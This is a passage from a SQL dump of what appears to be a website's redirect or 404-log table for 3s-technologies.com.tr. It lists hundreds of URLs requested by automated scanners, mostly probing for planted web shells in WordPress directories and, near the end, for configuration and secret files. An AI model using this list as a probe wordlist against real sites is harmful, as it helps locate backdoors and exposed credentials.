00:00:00',301),(45668,'http://3s-technologies.com.tr/tr/ptk.php',NULL,'','',1,0,'2025-08-27 17:12:07','0000-00-00 00:00:00',301),(45669,'http://3s-technologies.com.tr/tr/dog.php',NULL,'','',1,0,'2025-08-27 17:12:07','0000-00-00 00:00:00',301),(45670,'http://3s-technologies.com.tr/tr/wio.php',NULL,'','',7,0,'2025-08-27 17:12:08','0000-00-00 00:00:00',301),(45671,'http://3s-technologies.com.tr/tr/nc4.php',NULL,'','',131,0,'2025-08-27 17:12:10','0000-00-00 00:00:00',301),(45672,'http://3s-technologies.com.tr/tr/udr73i.php',NULL,'','',1,0,'2025-08-27 17:12:10','0000-00-00 00:00:00',301),(45673,'http://3s-technologies.com.tr/tr/class9.php',NULL,'','',54,0,'2025-08-28 05:07:56','0000-00-00 00:00:00',301),(45674,'http://3s-technologies.com.tr/tr/nfile.php',NULL,'','',24,0,'2025-08-28 05:08:04','0000-00-00 00:00:00',301),(45675,'http://3s-technologies.com.tr/en/bdkr28.php',NULL,'www.google.com','',1,0,'2025-08-28 10:07:27','0000-00-00 00:00:00',301),(45676,'http://3s-technologies.com.tr/en/wp-includes/plugins/instabuilder2/cache/plugins/moon.php',NULL,'www.google.com','',3,0,'2025-08-28 10:07:28','0000-00-00 00:00:00',301),(45677,'http://3s-technologies.com.tr/en/wp-admin/shell20211028.php',NULL,'www.google.com','',3,0,'2025-08-28 10:07:38','0000-00-00 00:00:00',301),(45678,'http://3s-technologies.com.tr/en/wp-admin/uwgqdecp.php',NULL,'www.google.com','',1,0,'2025-08-28 10:07:40','0000-00-00 00:00:00',301),(45679,'http://3s-technologies.com.tr/en/wp-content/alexus.php',NULL,'www.google.com','',3,0,'2025-08-28 10:07:42','0000-00-00 00:00:00',301),(45680,'http://3s-technologies.com.tr/en/wp-includes/plugins/instabuilder2/cache/up.php',NULL,'www.google.com','',3,0,'2025-08-28 10:07:43','0000-00-00 00:00:00',301),(45681,'http://3s-technologies.com.tr/en/image/xleet.php',NULL,'www.google.com','',3,0,'2025-08-28 10:07:44','0000-00-00 00:00:00',301),(45682,'http://3s-technologies.com.tr/en/image/hello.php',NULL,'www.google.com','',3,0,'2025-08-28 10:07:45','0000-00-00 00:00:00',301),(45683,'http://3s-technologies.com.tr/en/images/xleet.php',NULL,'www.google.com','',3,0,'2025-08-28 10:07:46','0000-00-00 00:00:00',301),(45684,'http://3s-technologies.com.tr/en/wp-admin/wp-includes/fw.php',NULL,'www.google.com','',4,0,'2025-08-28 10:07:47','0000-00-00 00:00:00',301),(45685,'http://3s-technologies.com.tr/en/image/upload.php',NULL,'www.google.com','',3,0,'2025-08-28 10:07:49','0000-00-00 00:00:00',301),(45686,'http://3s-technologies.com.tr/en/wp-admin/includes/export.php',NULL,'www.google.com','',3,0,'2025-08-28 10:07:55','0000-00-00 00:00:00',301),(45687,'http://3s-technologies.com.tr/en/foxwsov1.phpxx.php',NULL,'www.google.com','',1,0,'2025-08-28 10:07:56','0000-00-00 00:00:00',301),(45688,'http://3s-technologies.com.tr/en/wp-content/upload.php',NULL,'www.google.com','',3,0,'2025-08-28 10:08:07','0000-00-00 00:00:00',301),(45689,'http://3s-technologies.com.tr/en/wp-content/mrjn.php',NULL,'www.google.com','',3,0,'2025-08-28 10:08:08','0000-00-00 00:00:00',301),(45690,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresss3cll/up.php',NULL,'www.google.com','',4,0,'2025-08-28 10:08:11','0000-00-00 00:00:00',301),(45691,'http://3s-technologies.com.tr/en/wp-content/plugins/anttt/simple.php',NULL,'www.google.com','',4,0,'2025-08-28 10:08:12','0000-00-00 00:00:00',301),(45692,'http://3s-technologies.com.tr/en/wp-content/themes/ccx/index.php',NULL,'www.google.com','',3,0,'2025-08-28 10:08:15','0000-00-00 00:00:00',301),(45693,'http://3s-technologies.com.tr/en/wp-content/plugins/ccx/index.php',NULL,'www.google.com','',3,0,'2025-08-28 10:08:17','0000-00-00 00:00:00',301),(45694,'http://3s-technologies.com.tr/en/wp-includes/feed-rss-meta.php',NULL,'www.google.com','',1,0,'2025-08-28 10:08:18','0000-00-00 00:00:00',301),(45695,'http://3s-technologies.com.tr/en/wp-admin/xleet.php',NULL,'www.google.com','',3,0,'2025-08-28 10:08:19','0000-00-00 00:00:00',301),(45696,'http://3s-technologies.com.tr/en/.well-known/pki-validation/ir7szrsouep.php',NULL,'www.google.com','',1,0,'2025-08-28 10:08:20','0000-00-00 00:00:00',301),(45697,'http://3s-technologies.com.tr/en/.well-known/pki-validation/set.php',NULL,'www.google.com','',1,0,'2025-08-28 10:08:22','0000-00-00 00:00:00',301),(45698,'http://3s-technologies.com.tr/en/wp-includes/text/diff/renderer/recet.php',NULL,'www.google.com','',1,0,'2025-08-28 10:08:23','0000-00-00 00:00:00',301),(45699,'http://3s-technologies.com.tr/en/wp-includes/css/core.php',NULL,'www.google.com','',1,0,'2025-08-28 10:08:24','0000-00-00 00:00:00',301),(45700,'http://3s-technologies.com.tr/en/wp-includes/phpmailer/phpsmtp.php',NULL,'www.google.com','',1,0,'2025-08-28 10:08:25','0000-00-00 00:00:00',301),(45701,'http://3s-technologies.com.tr/en/wp-admin/css/colors/ectoplasm/contact.php',NULL,'www.google.com','',1,0,'2025-08-28 10:08:26','0000-00-00 00:00:00',301),(45702,'http://3s-technologies.com.tr/en/wp-admin/images/bypass403.php',NULL,'www.google.com','',1,0,'2025-08-28 10:08:26','0000-00-00 00:00:00',301),(45703,'http://3s-technologies.com.tr/en/wp-includes/js/codemirror/dir.php',NULL,'www.google.com','',1,0,'2025-08-28 10:08:28','0000-00-00 00:00:00',301),(45704,'http://3s-technologies.com.tr/en/wp-includes/pomo/pomo.php',NULL,'www.google.com','',1,0,'2025-08-28 10:08:29','0000-00-00 00:00:00',301),(45705,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-page-novw9p.php',NULL,'www.google.com','',1,0,'2025-08-28 10:08:30','0000-00-00 00:00:00',301),(45706,'http://3s-technologies.com.tr/en/wp-admin/wp-22.php',NULL,'www.google.com','',3,0,'2025-08-28 10:08:31','0000-00-00 00:00:00',301),(45707,'http://3s-technologies.com.tr/en/wp-includes/rest-api/alfa-rex.php7',NULL,'www.google.com','',1,0,'2025-08-28 10:08:31','0000-00-00 00:00:00',301),(45708,'http://3s-technologies.com.tr/en/wp-content/plugins/roobots.php',NULL,'www.google.com','',1,0,'2025-08-28 10:08:32','0000-00-00 00:00:00',301),(45709,'http://3s-technologies.com.tr/en/wp-content/plugins/seoplugins/db.php?u',NULL,'www.google.com','',3,0,'2025-08-28 10:08:36','0000-00-00 00:00:00',301),(45710,'http://3s-technologies.com.tr/en/wp-content/themes/pridmag/db.php?u',NULL,'www.google.com','',4,0,'2025-08-28 10:08:37','0000-00-00 00:00:00',301),(45711,'http://3s-technologies.com.tr/en/wp-content/plugins/linkpreview/db.php?u',NULL,'www.google.com','',3,0,'2025-08-28 10:08:40','0000-00-00 00:00:00',301),(45712,'http://3s-technologies.com.tr/en/wp-admin/ws.php',NULL,'www.google.com','',3,0,'2025-08-28 10:08:42','0000-00-00 00:00:00',301),(45713,'http://3s-technologies.com.tr/en/wp-content/index.php',NULL,'www.google.com','',138,0,'2025-08-28 10:08:44','0000-00-00 00:00:00',301),(45714,'http://3s-technologies.com.tr/en/wp-content/plugins/hello.php',NULL,'www.google.com','',5,0,'2025-08-28 10:08:45','0000-00-00 00:00:00',301),(45715,'http://3s-technologies.com.tr/en/wp-admin/css/default.php',NULL,'www.google.com','',1,0,'2025-08-28 10:08:46','0000-00-00 00:00:00',301),(45716,'http://3s-technologies.com.tr/en/wp-content/mu-plugins/blog.php',NULL,'www.google.com','',1,0,'2025-08-28 10:08:48','0000-00-00 00:00:00',301),(45717,'http://3s-technologies.com.tr/en/wp-content/themes/pridmag/mar.php',NULL,'www.google.com','',1,0,'2025-08-28 10:08:51','0000-00-00 00:00:00',301),(45718,'http://3s-technologies.com.tr/en/wp-content/plugins/w0rdpr3ssnew/about.php',NULL,'www.google.com','',3,0,'2025-08-28 10:08:52','0000-00-00 00:00:00',301),(45719,'http://3s-technologies.com.tr/en/wp-content/plugins/w0rdpr3ssnew/wp-login.php',NULL,'www.google.com','',4,0,'2025-08-28 10:08:53','0000-00-00 00:00:00',301),(45720,'http://3s-technologies.com.tr/en/wp-content/wp-wso.php',NULL,'www.google.com','',3,0,'2025-08-28 10:08:55','0000-00-00 00:00:00',301),(45721,'http://3s-technologies.com.tr/en/wp-content/plugins/w3-total-cache/up.php?db',NULL,'www.google.com','',1,0,'2025-08-28 10:09:02','0000-00-00 00:00:00',301),(45722,'http://3s-technologies.com.tr/en/wp-content/ave.php',NULL,'www.google.com','',1,0,'2025-08-28 10:09:03','0000-00-00 00:00:00',301),(45723,'http://3s-technologies.com.tr/en/wp-content/bypass.php',NULL,'www.google.com','',26,0,'2025-08-28 10:09:07','0000-00-00 00:00:00',301),(45724,'http://3s-technologies.com.tr/en/wtf.php',NULL,'www.google.com','',1,0,'2025-08-28 10:09:09','0000-00-00 00:00:00',301),(45725,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/bypass403.php',NULL,'www.google.com','',1,0,'2025-08-28 10:09:13','0000-00-00 00:00:00',301),(45726,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/load-scripts.php',NULL,'www.google.com','',1,0,'2025-08-28 10:09:14','0000-00-00 00:00:00',301),(45727,'http://3s-technologies.com.tr/en/wp-admin/css/about.php',NULL,'www.google.com','',55,0,'2025-08-28 10:09:15','0000-00-00 00:00:00',301),(45728,'http://3s-technologies.com.tr/en/wp-content/mu-plugins/a.php',NULL,'www.google.com','',1,0,'2025-08-28 10:09:19','0000-00-00 00:00:00',301),(45729,'http://3s-technologies.com.tr/en/wp-content/mu-plugins/s.php',NULL,'www.google.com','',1,0,'2025-08-28 10:09:20','0000-00-00 00:00:00',301),(45730,'http://3s-technologies.com.tr/en/241.php',NULL,'www.google.com','',2,0,'2025-08-28 10:09:22','0000-00-00 00:00:00',301),(45731,'http://3s-technologies.com.tr/en/406',NULL,'www.google.com','',1,0,'2025-08-28 10:09:26','0000-00-00 00:00:00',301),(45732,'http://3s-technologies.com.tr/en/bp.php',NULL,'www.google.com','',1,0,'2025-08-28 10:09:28','0000-00-00 00:00:00',301),(45733,'http://3s-technologies.com.tr/en/backups-dup-lite/dup-installer/main.installer.php',NULL,'www.google.com','',1,0,'2025-08-28 10:09:29','0000-00-00 00:00:00',301),(45734,'http://3s-technologies.com.tr/en/wp-content/uploads/ac_assets/indosec.php',NULL,'www.google.com','',2,0,'2025-08-28 10:09:37','0000-00-00 00:00:00',301),(45735,'http://3s-technologies.com.tr/en/-.php',NULL,'www.google.com','',1,0,'2025-08-28 10:09:38','0000-00-00 00:00:00',301),(45736,'http://3s-technologies.com.tr/en/wp-content/themes/mero-magazine/ws.php',NULL,'www.google.com','',4,0,'2025-08-28 10:09:39','0000-00-00 00:00:00',301),(45737,'http://3s-technologies.com.tr/en/m4r1ju4n4.php',NULL,'www.google.com','',3,0,'2025-08-28 10:09:45','0000-00-00 00:00:00',301),(45738,'http://3s-technologies.com.tr/en/wp-admin/css/mari.php',NULL,'www.google.com','',3,0,'2025-08-28 10:09:50','0000-00-00 00:00:00',301),(45739,'http://3s-technologies.com.tr/en/wp-content/plugins/owfsmac/mar.php',NULL,'www.google.com','',4,0,'2025-08-28 10:09:51','0000-00-00 00:00:00',301),(45740,'http://3s-technologies.com.tr/en/wp-admin/includes/mari.php',NULL,'www.google.com','',3,0,'2025-08-28 10:09:53','0000-00-00 00:00:00',301),(45741,'http://3s-technologies.com.tr/en/wp-admin/mari.php',NULL,'www.google.com','',3,0,'2025-08-28 10:09:55','0000-00-00 00:00:00',301),(45742,'http://3s-technologies.com.tr/en/wp-content/plugins/aryabot/mari.php',NULL,'www.google.com','',5,0,'2025-08-28 10:09:57','0000-00-00 00:00:00',301),(45743,'http://3s-technologies.com.tr/en/wp-content/plugins/aryabot/mar.php',NULL,'www.google.com','',1,0,'2025-08-28 10:09:58','0000-00-00 00:00:00',301),(45744,'http://3s-technologies.com.tr/en/wp-content/plugins/owfsmac/maro.php',NULL,'www.google.com','',1,0,'2025-08-28 10:09:59','0000-00-00 00:00:00',301),(45745,'http://3s-technologies.com.tr/en/wp-admin/1234.php',NULL,'www.google.com','',3,0,'2025-08-28 10:10:01','0000-00-00 00:00:00',301),(45746,'http://3s-technologies.com.tr/en/wp-admin/asdasd.php',NULL,'www.google.com','',3,0,'2025-08-28 10:10:01','0000-00-00 00:00:00',301),(45747,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/uploader.php',NULL,'www.google.com','',3,0,'2025-08-28 10:10:02','0000-00-00 00:00:00',301),(45748,'http://3s-technologies.com.tr/en/.well-known/pki-validation/ssl.php?xsec=blocker',NULL,'www.google.com','',1,0,'2025-08-28 10:10:03','0000-00-00 00:00:00',301),(45749,'http://3s-technologies.com.tr/en/wp-content/plugins/core-stab/index.php',NULL,'www.google.com','',3,0,'2025-08-28 10:10:05','0000-00-00 00:00:00',301),(45750,'http://3s-technologies.com.tr/en/wp-includes/rest-api/tablepress_controllers.php',NULL,'www.google.com','',2,0,'2025-08-28 10:10:08','0000-00-00 00:00:00',301),(45751,'http://3s-technologies.com.tr/en/index.php?3x=3x',NULL,'www.google.com','',1,0,'2025-08-28 10:10:10','0000-00-00 00:00:00',301),(45752,'http://3s-technologies.com.tr/en/wp-includes/pomo/newup.php',NULL,'www.google.com','',2,0,'2025-08-28 10:10:11','0000-00-00 00:00:00',301),(45753,'http://3s-technologies.com.tr/en/wp-admin/ss.php',NULL,'www.google.com','',1,0,'2025-08-28 10:10:13','0000-00-00 00:00:00',301),(45754,'http://3s-technologies.com.tr/en/wp-content/olux_czadazdazdzad.php',NULL,'www.google.com','',1,0,'2025-08-28 10:10:14','0000-00-00 00:00:00',301),(45755,'http://3s-technologies.com.tr/en/wp-content/plugins/seoplugins/olux_czadazdazdzad.php',NULL,'www.google.com','',1,0,'2025-08-28 10:10:15','0000-00-00 00:00:00',301),(45756,'http://3s-technologies.com.tr/en/wp-content/gwtmqkos.php',NULL,'www.google.com','',1,0,'2025-08-28 10:10:16','0000-00-00 00:00:00',301),(45757,'http://3s-technologies.com.tr/en/wp-admin/includes/logs.php',NULL,'www.google.com','',4,0,'2025-08-28 10:10:18','0000-00-00 00:00:00',301),(45758,'http://3s-technologies.com.tr/en/wp-includes/pomo/treame.php',NULL,'www.google.com','',2,0,'2025-08-28 10:10:19','0000-00-00 00:00:00',301),(45759,'http://3s-technologies.com.tr/en/wp-includes/id3/vp.php',NULL,'www.google.com','',2,0,'2025-08-28 10:10:20','0000-00-00 00:00:00',301),(45760,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/alfa.php',NULL,'www.google.com','',2,0,'2025-08-28 10:10:21','0000-00-00 00:00:00',301),(45761,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-index.php',NULL,'www.google.com','',2,0,'2025-08-28 10:10:23','0000-00-00 00:00:00',301),(45762,'http://3s-technologies.com.tr/en/wp-includes/xl2023.php',NULL,'www.google.com','',4,0,'2025-08-28 10:10:26','0000-00-00 00:00:00',301),(45763,'http://3s-technologies.com.tr/en/wp-content/xl2023.php',NULL,'www.google.com','',4,0,'2025-08-28 10:10:27','0000-00-00 00:00:00',301),(45764,'http://3s-technologies.com.tr/en/wp-admin/xl2023.php',NULL,'www.google.com','',4,0,'2025-08-28 10:10:28','0000-00-00 00:00:00',301),(45765,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core/curve25519/ge/wp_blog.php',NULL,'www.google.com','',3,0,'2025-08-28 10:10:37','0000-00-00 00:00:00',301),(45766,'http://3s-technologies.com.tr/en/sitemap.php',NULL,'www.google.com','',1,0,'2025-08-28 10:10:40','0000-00-00 00:00:00',301),(45767,'http://3s-technologies.com.tr/en/wp-includes/requests/about.php',NULL,'www.google.com','',80,0,'2025-08-28 10:10:41','0000-00-00 00:00:00',301),(45768,'http://3s-technologies.com.tr/en/wp-includes/css/1877.php',NULL,'www.google.com','',2,0,'2025-08-28 10:10:42','0000-00-00 00:00:00',301),(45769,'http://3s-technologies.com.tr/en/css/st.php',NULL,'www.google.com','',2,0,'2025-08-28 10:10:43','0000-00-00 00:00:00',301),(45770,'http://3s-technologies.com.tr/en/wp-content/uploads/w-17.php',NULL,'www.google.com','',2,0,'2025-08-28 10:10:44','0000-00-00 00:00:00',301),(45771,'http://3s-technologies.com.tr/en/wp-includes/xx.php',NULL,'www.google.com','',4,0,'2025-08-28 10:10:46','0000-00-00 00:00:00',301),(45772,'http://3s-technologies.com.tr/en/wp-includes/js/system.php',NULL,'www.google.com','',2,0,'2025-08-28 10:10:47','0000-00-00 00:00:00',301),(45773,'http://3s-technologies.com.tr/en/wp-utchiha.php7',NULL,'www.google.com','',1,0,'2025-08-28 10:10:48','0000-00-00 00:00:00',301),(45774,'http://3s-technologies.com.tr/en/wp-content/upgrade/cloud.php',NULL,'www.google.com','',1,0,'2025-08-28 10:10:49','0000-00-00 00:00:00',301),(45775,'http://3s-technologies.com.tr/en/wp-admin/js/wp-9fz6j.php',NULL,'www.google.com','',1,0,'2025-08-28 10:10:50','0000-00-00 00:00:00',301),(45776,'http://3s-technologies.com.tr/en/wp-includes/images/preg_class.php',NULL,'www.google.com','',1,0,'2025-08-28 10:10:51','0000-00-00 00:00:00',301),(45777,'http://3s-technologies.com.tr/en/.well-known/subirfoto.php',NULL,'www.google.com','',3,0,'2025-08-28 10:10:53','0000-00-00 00:00:00',301),(45778,'http://3s-technologies.com.tr/en/wp-includes/kab.php',NULL,'www.google.com','',1,0,'2025-08-28 10:10:54','0000-00-00 00:00:00',301),(45779,'http://3s-technologies.com.tr/en/.well-known/pki-validation/moon.php',NULL,'www.google.com','',1,0,'2025-08-28 10:10:55','0000-00-00 00:00:00',301),(45780,'http://3s-technologies.com.tr/en/wp-admin/images/archivey.php',NULL,'www.google.com','',1,0,'2025-08-28 10:10:56','0000-00-00 00:00:00',301),(45781,'http://3s-technologies.com.tr/en/.well-known/pki-validation/install.php',NULL,'www.google.com','',1,0,'2025-08-28 10:10:57','0000-00-00 00:00:00',301),(45782,'http://3s-technologies.com.tr/en/wp-includes/requests/bak.php',NULL,'www.google.com','',1,0,'2025-08-28 10:10:58','0000-00-00 00:00:00',301),(45783,'http://3s-technologies.com.tr/en/wp-content/mu-plugins/moon.php',NULL,'www.google.com','',1,0,'2025-08-28 10:10:59','0000-00-00 00:00:00',301),(45784,'http://3s-technologies.com.tr/en/wp-includes/rest-api/about.php',NULL,'www.google.com','',7,0,'2025-08-28 10:10:59','0000-00-00 00:00:00',301),(45785,'http://3s-technologies.com.tr/en/wp-content/upgrade/cs.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:00','0000-00-00 00:00:00',301),(45786,'http://3s-technologies.com.tr/en/wp-includes/text/username-strcspn.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:01','0000-00-00 00:00:00',301),(45787,'http://3s-technologies.com.tr/en/wp-includes/pomo/about.php',NULL,'www.google.com','',6,0,'2025-08-28 10:11:02','0000-00-00 00:00:00',301),(45788,'http://3s-technologies.com.tr/en/wp-content/themes/remv.php.infected.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:03','0000-00-00 00:00:00',301),(45789,'http://3s-technologies.com.tr/en/.well-known/autoload_classmap.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:04','0000-00-00 00:00:00',301),(45790,'http://3s-technologies.com.tr/en/wp-admin/css/uplo.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:06','0000-00-00 00:00:00',301),(45791,'http://3s-technologies.com.tr/en/wp-includes/pomo/yellow.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:07','0000-00-00 00:00:00',301),(45792,'http://3s-technologies.com.tr/en/wp-admin/js/maila.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:08','0000-00-00 00:00:00',301),(45793,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/install.php',NULL,'www.google.com','',3,0,'2025-08-28 10:11:09','0000-00-00 00:00:00',301),(45794,'http://3s-technologies.com.tr/en/wp-content/uploads/ipc9z9.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:11','0000-00-00 00:00:00',301),(45795,'http://3s-technologies.com.tr/en/wp-content/siteindex.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:12','0000-00-00 00:00:00',301),(45796,'http://3s-technologies.com.tr/en/wp-admin/images/mhbgf.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:13','0000-00-00 00:00:00',301),(45797,'http://3s-technologies.com.tr/en/wp-admin/css/json_decode.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:14','0000-00-00 00:00:00',301),(45798,'http://3s-technologies.com.tr/en/wp-includes/customize/about.php',NULL,'www.google.com','',6,0,'2025-08-28 10:11:14','0000-00-00 00:00:00',301),(45799,'http://3s-technologies.com.tr/en/wp-content/upgrade/about.php',NULL,'www.google.com','',3,0,'2025-08-28 10:11:15','0000-00-00 00:00:00',301),(45800,'http://3s-technologies.com.tr/en/wp-content/bak.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:16','0000-00-00 00:00:00',301),(45801,'http://3s-technologies.com.tr/en/wp-content/uploads/mon6.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:17','0000-00-00 00:00:00',301),(45802,'http://3s-technologies.com.tr/en/wp-admin/images/wp-info.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:18','0000-00-00 00:00:00',301),(45803,'http://3s-technologies.com.tr/en/wp-includes/text/wp-xl504.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:18','0000-00-00 00:00:00',301),(45804,'http://3s-technologies.com.tr/en/wp-admin/images/old.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:19','0000-00-00 00:00:00',301),(45805,'http://3s-technologies.com.tr/en/wp-includes/fonts/send.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:21','0000-00-00 00:00:00',301),(45806,'http://3s-technologies.com.tr/en/wp-includes/text/about.php',NULL,'www.google.com','',7,0,'2025-08-28 10:11:25','0000-00-00 00:00:00',301),(45807,'http://3s-technologies.com.tr/en/wp-includes/pomo/wp-login.php',NULL,'www.google.com','',3,0,'2025-08-28 10:11:26','0000-00-00 00:00:00',301),(45808,'http://3s-technologies.com.tr/en/wp-includes/js/leafmailer.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:27','0000-00-00 00:00:00',301),(45809,'http://3s-technologies.com.tr/en/wp-content/plugins/elementor/up.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:28','0000-00-00 00:00:00',301),(45810,'http://3s-technologies.com.tr/en/wp-includes/pomo/js.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:29','0000-00-00 00:00:00',301),(45811,'http://3s-technologies.com.tr/en/wp-content/themes/fx.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:31','0000-00-00 00:00:00',301),(45812,'http://3s-technologies.com.tr/en/wp-includes/hsonkzfgr.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:33','0000-00-00 00:00:00',301),(45813,'http://3s-technologies.com.tr/en/.well-known/wpx.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:34','0000-00-00 00:00:00',301),(45814,'http://3s-technologies.com.tr/en/wp-admin/css/quych.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:36','0000-00-00 00:00:00',301),(45815,'http://3s-technologies.com.tr/en/wp-content/uploads/aa.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:37','0000-00-00 00:00:00',301),(45816,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/cloud.php',NULL,'www.google.com','',3,0,'2025-08-28 10:11:38','0000-00-00 00:00:00',301),(45817,'http://3s-technologies.com.tr/en/wp-admin/images/404.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:39','0000-00-00 00:00:00',301),(45818,'http://3s-technologies.com.tr/en/wp-includes/text/themes.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:41','0000-00-00 00:00:00',301),(45819,'http://3s-technologies.com.tr/en/wp-includes/tsmailer.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:42','0000-00-00 00:00:00',301),(45820,'http://3s-technologies.com.tr/en/wp-includes/text/diff/renderer/content.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:43','0000-00-00 00:00:00',301),(45821,'http://3s-technologies.com.tr/en/wp-includes/images/wp-8irnt.php',NULL,'www.google.com','',1,0,'2025-08-28 10:11:44','0000-00-00 00:00:00',301),(45822,'http://3s-technologies.com.tr/tr/price.php',NULL,'','',5,0,'2025-08-28 10:28:30','0000-00-00 00:00:00',301),(45823,'http://3s-technologies.com.tr/tr/wolv.php',NULL,'','',9,0,'2025-08-28 10:28:30','0000-00-00 00:00:00',301),(45824,'http://3s-technologies.com.tr/tr/ask.php',NULL,'','',5,0,'2025-08-28 10:28:32','0000-00-00 00:00:00',301),(45825,'http://3s-technologies.com.tr/tr/okxob.php',NULL,'','',46,0,'2025-08-28 10:28:34','0000-00-00 00:00:00',301),(45826,'http://3s-technologies.com.tr/tr/d4.php',NULL,'','',5,0,'2025-08-28 10:28:34','0000-00-00 00:00:00',301),(45827,'http://3s-technologies.com.tr/tr/lock1.php',NULL,'','',10,0,'2025-08-28 10:28:35','0000-00-00 00:00:00',301),(45828,'http://3s-technologies.com.tr/tr/png.php',NULL,'','',35,0,'2025-08-28 10:28:37','0000-00-00 00:00:00',301),(45829,'http://3s-technologies.com.tr/tr/idea.php',NULL,'','',5,0,'2025-08-28 10:28:37','0000-00-00 00:00:00',301),(45830,'http://3s-technologies.com.tr/tr/shlo.php',NULL,'','',40,0,'2025-08-28 10:28:38','0000-00-00 00:00:00',301),(45831,'http://3s-technologies.com.tr/tr/tll.php',NULL,'','',5,0,'2025-08-28 10:28:39','0000-00-00 00:00:00',301),(45832,'http://3s-technologies.com.tr/tr/ticket.php',NULL,'','',8,0,'2025-08-28 10:28:40','0000-00-00 00:00:00',301),(45833,'http://3s-technologies.com.tr/tr/sfvul.php',NULL,'','',5,0,'2025-08-28 10:28:41','0000-00-00 00:00:00',301),(45834,'http://3s-technologies.com.tr/tr/icdwb.php',NULL,'','',5,0,'2025-08-28 10:28:41','0000-00-00 00:00:00',301),(45835,'http://3s-technologies.com.tr/tr/fjpeb.php',NULL,'','',5,0,'2025-08-28 10:28:41','0000-00-00 00:00:00',301),(45836,'http://3s-technologies.com.tr/tr/npi.php',NULL,'','',5,0,'2025-08-28 10:28:42','0000-00-00 00:00:00',301),(45837,'http://3s-technologies.com.tr/tr/phpshelldownload.com/index.php',NULL,'','',5,0,'2025-08-28 12:19:34','0000-00-00 00:00:00',301),(45838,'http://3s-technologies.com.tr/en/js/chunk-libs.js',NULL,'','',1,0,'2025-08-28 21:41:39','0000-00-00 00:00:00',301),(45839,'http://3s-technologies.com.tr/en/inetpub/wwwroot/js/config.js',NULL,'','',1,0,'2025-08-28 21:41:45','0000-00-00 00:00:00',301),(45840,'http://3s-technologies.com.tr/en/src/main.js',NULL,'','',1,0,'2025-08-28 21:41:47','0000-00-00 00:00:00',301),(45841,'http://3s-technologies.com.tr/en/htdocs/js/config.js',NULL,'','',1,0,'2025-08-28 21:41:53','0000-00-00 00:00:00',301),(45842,'http://3s-technologies.com.tr/en/config/queue.js',NULL,'','',1,0,'2025-08-28 21:41:57','0000-00-00 00:00:00',301),(45843,'http://3s-technologies.com.tr/en/tokens.js',NULL,'','',1,0,'2025-08-28 21:42:00','0000-00-00 00:00:00',301),(45844,'http://3s-technologies.com.tr/en/phpmyadmin/js/config.js',NULL,'','',2,0,'2025-08-28 21:42:03','0000-00-00 00:00:00',301),(45845,'http://3s-technologies.com.tr/en/webpack.config.js',NULL,'','',1,0,'2025-08-28 21:42:06','0000-00-00 00:00:00',301),(45846,'http://3s-technologies.com.tr/en/build/bundle.js',NULL,'','',1,0,'2025-08-28 21:42:09','0000-00-00 00:00:00',301),(45847,'http://3s-technologies.com.tr/en/administrator/js/config.js',NULL,'','',1,0,'2025-08-28 21:42:16','0000-00-00 00:00:00',301),(45848,'http://3s-technologies.com.tr/en/var/www/html/js/config.js',NULL,'','',1,0,'2025-08-28 21:42:22','0000-00-00 00:00:00',301),(45849,'http://3s-technologies.com.tr/en/webmin/js/config.js',NULL,'','',1,0,'2025-08-28 21:42:26','0000-00-00 00:00:00',301),(45850,'http://3s-technologies.com.tr/en/wp-content/themes/enfold/js/config.js',NULL,'','',1,0,'2025-08-28 21:42:31','0000-00-00 00:00:00',301),(45851,'http://3s-technologies.com.tr/en/config/session.js',NULL,'','',1,0,'2025-08-28 21:42:36','0000-00-00 00:00:00',301),(45852,'http://3s-technologies.com.tr/en/public/js/vendor.js',NULL,'','',1,0,'2025-08-28 21:42:39','0000-00-00 00:00:00',301),(45853,'http://3s-technologies.com.tr/en/config/auth.js',NULL,'','',1,0,'2025-08-28 21:42:45','0000-00-00 00:00:00',301),(45854,'http://3s-technologies.com.tr/en/wp-content/plugins/wordfence/js/config.js',NULL,'','',1,0,'2025-08-28 21:42:55','0000-00-00 00:00:00',301),(45855,'http://3s-technologies.com.tr/en/.env.staging.js',NULL,'','',1,0,'2025-08-28 21:42:57','0000-00-00 00:00:00',301),(45856,'http://3s-technologies.com.tr/en/js/settings.js',NULL,'','',1,0,'2025-08-28 21:42:59','0000-00-00 00:00:00',301),(45857,'http://3s-technologies.com.tr/en/resources/js/app.js',NULL,'','',1,0,'2025-08-28 21:43:00','0000-00-00 